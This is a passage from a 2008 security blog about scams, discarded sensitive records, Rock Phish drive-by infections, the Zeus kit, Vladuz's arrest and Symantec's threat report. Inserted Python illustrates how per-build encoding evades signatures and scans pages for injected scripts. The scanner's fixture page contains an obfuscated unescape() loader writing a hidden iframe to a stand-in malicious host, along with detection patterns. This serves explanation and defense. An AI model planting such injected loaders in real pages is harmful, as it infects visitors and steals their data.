Of course, the lottery scam isn't the only one out there. Work-at-home (job), secret shopper, romance and auction scams are being sent out in millions (billions?) of e-mails as well. And if you don't have your own financial resources, the scammers will gladly provide you with a wide array of counterfeit financial instruments to negotiate. They couldn't care less if you get arrested, and they expect you to wire them the proceeds if you successfully pass the bogus instrument.

Please note that just because you are initially able to pass the instrument doesn't mean that someone won't come after you later.

The news release from Newport Beach Police Department offers the following advice on how to report scams like this:

The FTC works for the consumer to prevent fraudulent, deceptive, and unfair business practices in the marketplace and to provide information to help consumers spot, stop, and avoid them. To file a complaint or to get free information on consumer issues, visit ftc.gov or call toll-free, 1-877-FTC-HELP (1-877-382-4357); TTY: 1-866-653-4261. The FTC enters Internet, telemarketing, identity theft, and other fraud-related complaints into Consumer Sentinel, a secure online database available to hundreds of civil and criminal law enforcement agencies in the U.S. and abroad.

They also point to a page on the FTC website about cross border scams, which can be seen here.

If you are a more "visual type," I recommend going to fakechecks.org, which has a series of video presentations on this subject.

Wednesday, April 23, 2008

WTC construction plans/hundreds of worker's personal information trashed at Ground Zero

When it comes to information being compromised, a lot of it can be traced to simple human error, a.k.a. "stupidity."

A glaring testament to this fact is being reported by the New York Post:

Hundreds of Ground Zero workers were exposed to potential identity theft when stacks of payroll sheets - which included their names and Social Security numbers - were dumped in the trash along with confidential plans for the new World Trade Center.
Plans for the new Port Authority Police Station were also found.

Fortunately, it was a homeless person who discovered the plans for the new Freedom Tower (presumably while dumpster diving).

This prompted two unnamed individuals, described as "salvage experts," to turn in the other sensitive documents found in the trash:

Included in the stash were blueprints for World Trade Center 4 and the temporary PATH station, construction specifications for World Trade Center 7 and plans for the PA Police headquarters.
In this instance, we are probably lucky that salvage experts and a homeless person found this sensitive information instead of a criminal or, even worse, an Osama Bin Laden "wannabe."

If you would like to see other examples of human error (or stupidity) causing information to be compromised, the DLDOS database at Attrition.org and PogoWasRight have a lot of examples that they share with the public at large.

PogoWasRight's mantra, "WE HAVE MET THE ENEMY AND HE IS US" certainly applies in this instance!

New York Post story by Lukas I. Alpert and Matthew Nestel, here.

Tuesday, April 22, 2008

Nowadays, all you need to do is visit the wrong site to have your personal information stolen!

On his birthday, Uriel Maimon of RSA reflected on a lot of personal things (as most of us do), as well as on how spam and phishing are becoming more sophisticated and dangerous.

One major player in the spam and phishing game is the group known as the "Rock Phish." In his birthday post, Uriel gives a little historical perspective on the group:

The Rock Phish group is a phishing gang believed to be based out of Russia -- and, by some accounts, is responsible for roughly 50% of phishing attacks by volume. The Rock gang has also pioneered several new approaches in phishing: in 2004 it was the first (and, for a long time, they were the only) gang to employ bot-nets in its phishing infrastructure in order to make the attacks live longer and be more scalable. It also pioneered new techniques in its spam mails so the mail could more easily evade spam filters.

Apparently, the Rock Phish are now setting up a double whammy for anyone foolish enough to click on a socially engineered link in a spam e-mail. Counting on the fact that many more people visit phishing sites than actually type in their personal details, the Rock Phish are loading the sites with crimeware that steals personal information automatically.

More specifically, Uriel describes how a "drive-by infection" works:

This is done via a technique called "drive-by infection", wherein a vulnerability in the victim's operating system, browser, or software is exploited in order to infect the victim without his/her knowledge (and much less his/her consent, or with the victim having to proactively download software). The vulnerabilities that are exploited in these situations are often unknown to the software vendors and therefore often not addressed, leaving the victims defenseless (just like your humble servant finds himself when in the company of a beautiful woman).

Even worse, it appears that the Rock Phish make it easy for any criminal to mount a pretty sophisticated phishing expedition by selling all the "tackle" necessary to do it for a measly $700.00.

Known as the "Zeus kit," in honor of the Zeus Trojan, the kit is fairly resistant to security software because it comes with a binary generator (a builder) that produces a differently encoded executable every time it is run. Anti-virus programs mostly rely on spotting fixed byte patterns, known as "signatures," and those patterns change from one build to the next. Even if a security program recognizes one build, the next one will probably slip past it.
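To make concrete why a per-build generator beats whole-file signature scanning, but not an analyst who gets hold of even one build (which is exactly what the Zeus seller's "your bot will be sent to the antivirus companies" threat, quoted in the May 1 post above, relies on), here is a toy model I've added for this post. It is not code from the Zeus kit, from RSA or from Symantec: the "code section" bytes, the config layout, the marker and the C2 URL are all made up. A hash of one build misses the next build; a pattern taken from the bytes the builder never changes catches both, and because the key travels inside the file, the configuration can be recovered from a single sample.

```python
"""Toy model of a kit 'binary generator' versus two kinds of AV signature.
Constructed for this post: the code bytes, config layout and C2 URL are made
up and nothing here is taken from the real Zeus kit."""
import hashlib
import os
import re

# Assumption: the bot's code, which the builder copies unchanged into every build.
CODE_SECTION = (
    b"\x55\x8b\xec\x83\xec\x40"             # a plausible x86 function prologue
    b"GRABFORMS\x00INJECT\x00KEYLOG\x00"    # made-up feature strings
    b"\x8b\x45\x08\x50\xe8\x00\x00\x00\x00"
)
CONFIG_MARKER = b"CFG"   # made-up marker that precedes the config blob


def build_bot(c2_url: bytes) -> bytes:
    """Model of the builder: same code every time, plus a config blob XOR-encoded
    with a fresh random key, so every output file has different bytes."""
    key = os.urandom(16)
    encoded = bytes(b ^ key[i % 16] for i, b in enumerate(c2_url))
    return CODE_SECTION + CONFIG_MARKER + key + len(c2_url).to_bytes(2, "big") + encoded


def file_hash(sample: bytes) -> str:
    return hashlib.sha256(sample).hexdigest()


def hash_signature_hits(sample: bytes, known_hashes: set) -> bool:
    """Whole-file signature: only matches the exact build the analyst already saw."""
    return file_hash(sample) in known_hashes


# Pattern signature over bytes the builder never touches, derived from one build.
CODE_PATTERN = re.compile(
    re.escape(b"\x55\x8b\xec\x83\xec\x40") + b".{0,64}?GRABFORMS\x00", re.S)


def pattern_signature_hits(sample: bytes) -> bool:
    return CODE_PATTERN.search(sample) is not None


def extract_c2(sample: bytes) -> bytes:
    """What an analyst can do with a single build: the key is in the file, so the
    configuration (here, the C2 URL) is recoverable from the sample alone."""
    start = sample.index(CONFIG_MARKER) + len(CONFIG_MARKER)
    key = sample[start:start + 16]
    length = int.from_bytes(sample[start + 16:start + 18], "big")
    encoded = sample[start + 18:start + 18 + length]
    return bytes(b ^ key[i % 16] for i, b in enumerate(encoded))


def compare_signatures(c2_url: bytes) -> dict:
    """Build twice with the same config; report which signature catches which build."""
    first = build_bot(c2_url)
    known = {file_hash(first)}          # the one sample the AV vendor received
    second = build_bot(c2_url)          # same config, regenerated key
    return {
        "hash_catches_first": hash_signature_hits(first, known),
        "hash_catches_second": hash_signature_hits(second, known),
        "pattern_catches_first": pattern_signature_hits(first),
        "pattern_catches_second": pattern_signature_hits(second),
        "c2_from_second": extract_c2(second),
    }


if __name__ == "__main__":
    for name, value in compare_signatures(b"http://c2.example.invalid/gate.php").items():
        print(name, value)
```

Real builders change far more than a config blob (packing, encryption, junk code), which is why vendors moved toward behavioural detection and emulation; but the asymmetry shown here still holds: the seller's threat works because one build in an analyst's hands is enough to pull out the invariant parts and the embedded configuration.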

For the less technically inclined, the Zeus kit offers the information thief a lot of operational capabilities, including "the ability to take screenshots of a victim's machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs," according to Uriel.

There is little doubt that criminal groups like the Rock Phish are making the Internet more dangerous all the time. As far as getting infected while "driving by" a site goes, Websense announced today that a mass attack via malicious JavaScript injection is infecting thousands of trusted sites, including government ones. According to the report released today, this activity has exploded by a "factor of ten."

Sophos also mentioned in its Q1 Security Threat Report that it is finding infected web pages at a rate of one every five seconds.

In simple terms, all the average web surfer has to do is visit one of these sites to become infected and have their information stolen.
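The Websense report describes legitimate pages being modified to carry a few lines of hostile JavaScript; the telltale signs site owners usually find are a script tag pointing at a host they don't control, a blob of percent-encoded text fed to unescape() and written into the page, or a script appended after the closing </html>. The scanner below is an added example for this post, not Websense's or Sophos's detection logic and not from Uriel's post: it checks every script tag on a page against an allowlist of hosts and flags inline code that looks obfuscated. The sample page, the hostnames (example-agency.gov, malicious.invalid) and the escape-count threshold are constructed assumptions.

```python
"""Heuristic check for injected <script> blocks of the kind seen in mass
JavaScript-injection compromises.  Constructed example for this post: the
sample page and hostnames are made up, and the thresholds are assumptions."""
import re
from urllib.parse import urlparse

# Assumption: hosts this site is allowed to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example-agency.gov", "ajax.googleapis.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
# Calls legitimate site code rarely needs but injected loaders lean on.
OBFUSCATION_RE = re.compile(
    r"unescape\s*\(|eval\s*\(|String\.fromCharCode|document\.write\s*\(", re.I)
ESCAPED_CHAR_RE = re.compile(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
MIN_ESCAPES = 20  # assumption: fewer than this is probably a harmless encoded string


def scan_html(html: str) -> list:
    """Return (kind, detail) findings for scripts that look injected."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname  # None for relative URLs
            if host and host.lower() not in ALLOWED_SCRIPT_HOSTS:
                findings.append(("external-script", host))
            continue
        calls = len(OBFUSCATION_RE.findall(body))
        escapes = len(ESCAPED_CHAR_RE.findall(body))
        if calls and escapes >= MIN_ESCAPES:
            findings.append(("obfuscated-inline",
                             f"{calls} decode/eval calls, {escapes} escaped chars"))
    # Automated injectors often append to the file, leaving script after </html>.
    if re.search(r"</html>\s*<script\b", html, re.I):
        findings.append(("script-after-html-close", ""))
    return findings


def _percent_encode(text: str) -> str:
    return "".join(f"%{ord(c):02X}" for c in text)


# Constructed sample: a clean jQuery include, an injected unescape() loader that
# writes a hidden iframe, and an appended script from a host the site doesn't own.
INJECTED_IFRAME = '<iframe src="http://malicious.invalid/in.php" width=0 height=0></iframe>'
SAMPLE_PAGE = (
    '<html><head>\n'
    '<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>\n'
    "<script>document.write(unescape('" + _percent_encode(INJECTED_IFRAME) + "'));</script>\n"
    '</head><body>Agency news and forms.</body></html>\n'
    '<script src="http://malicious.invalid/b.js"></script>\n'
)
CLEAN_PAGE = '<html><head><script src="/js/site.js"></script></head><body>ok</body></html>'

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(kind, detail)
```

Run this over a copy of your own site's pages (or a nightly crawl) and diff the output against the previous run; a new "external-script" host appearing across many pages at once is the signature of a mass injection rather than a developer change. Relative script paths are treated as same-origin and skipped, so a compromise that drops a file into your own web root still needs file-integrity monitoring to catch.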

It's probably a good time to make sure your browser, its plug-ins and your security software are all up to date (drive-by attacks lean on unpatched software first), and to just say delete to any spam getting past whatever filter you are currently using. By the way, has anyone besides me noticed that more and more spam has been getting past these filters in the past couple of weeks?

Blog post at RSA by Uriel Maimon, here.

By the way, I noticed that despite a lot of us commenting on this great post, no one bothered to wish him a Happy Birthday. The post has a lot of good information on it and it would be nice to thank him for educating the rest of us.

Friday, April 18, 2008

Vladuz busted, according to eBay

Vladuz, the mysterious hacker who seemed to take great pleasure in hacking eBay, has been arrested, according to eBay.

Ina Steiner reports on the AuctionBytes blog:

A cyber-criminal who embarrassed eBay for nearly a year with claims he had hacked the site was arrested on Thursday, according to eBay. "Vladuz" had harassed eBay with his taunting from December 2006 through October 2007, when he accessed eBay servers and gained limited access to a very small number of eBay accounts on the eBay.com site. (eBay said at the time that at no point did the fraudster get any access to financial information or other sensitive information.).
Thus far only eBay is confirming the arrest:

eBay spokesperson Nichola Sharpe said local Romanian law enforcement officials would have to confirm details, as they considered the case confidential until a conviction was made. Asked why eBay had issued a press release, Sharpe said eBay wanted to thank all of the law enforcement agencies involved who collaborated in the case. She also said that the community was aware of Vladuz, and said, "This is obviously great news."
eBay states that Vladuz never accessed any financial information, but I’m not certain that was his intention in the first place.

There are some who believe his intention was to point out the massive amount of fraud occurring on auction sites and to show weaknesses in eBay’s system that could be exploited.

After all, unless he is mentally disturbed, why else would he make his efforts so public? Most criminals prefer to remain anonymous when committing financial crimes. They make a lot more money that way.

Here is a previous post I did on the mysterious Vladuz:

Did Vladuz hack eBay, or is stockpiled stolen information being used to make it look like he did?

Thursday, April 17, 2008

Symantec releases Internet Security Threat Report

Symantec recently issued its Internet Security Threat Report, which covers the second half of 2007. The key findings are that malicious activity has become web-based, attackers are going after end users rather than computers, the underground economy is maturing and consolidating, and the bad guys are getting better at improvising and adapting.

The report confirms that hacker toolkits are increasingly making it easy for less sophisticated types to commit technical crimes effectively. Symantec also believes these toolkits are being professionally developed, which supports the conclusion that the underground economy is maturing and consolidating.

Perhaps the availability of toolkits is the reason a 559 percent increase in phishing websites has been noted.

The report also shows that the bad guys are going after "trusted" sites, such as social networking sites.

The underground economy in stolen financial details is also growing. These details, which are sold in Internet forums, are getting cheaper. With all the phishing going on, coupled with a record number of data breaches, an oversupply of stolen information is the likely reason. The report found a wide range of prices for payment card numbers, from 40 cents to $20 per card.

The easy availability of encoders and other portable payment card technology makes it "too easy" to turn the numbers into realistic-looking plastic. In addition, there is a thriving market in counterfeit documents, which provides a wide array of realistic counterfeit identification to back up the counterfeit financial instruments.

Besides identities and payment card details, stolen bank account details are becoming increasingly available. Symantec attributes this to a corresponding increase in banking Trojans over the second half of 2007.

Besides being used to clean out an account, bank account details are useful to criminals committing check fraud. Anyone who follows scams on the Internet knows that counterfeit checks are being delivered to unsuspecting mules to cash in a variety of advance fee (419) type scams. Please note that there are also organized gangs who move from area to area committing check fraud with mules who know exactly what they are doing.

Recently, an international task force monitored the mail and discovered large amounts of counterfeit checks being shipped throughout North America and the European Union.

All in all, this report is a very interesting read. If you are a more visual type, Symantec also did a very nice Flash presentation on it, which can be seen on the page linked in the previous sentence.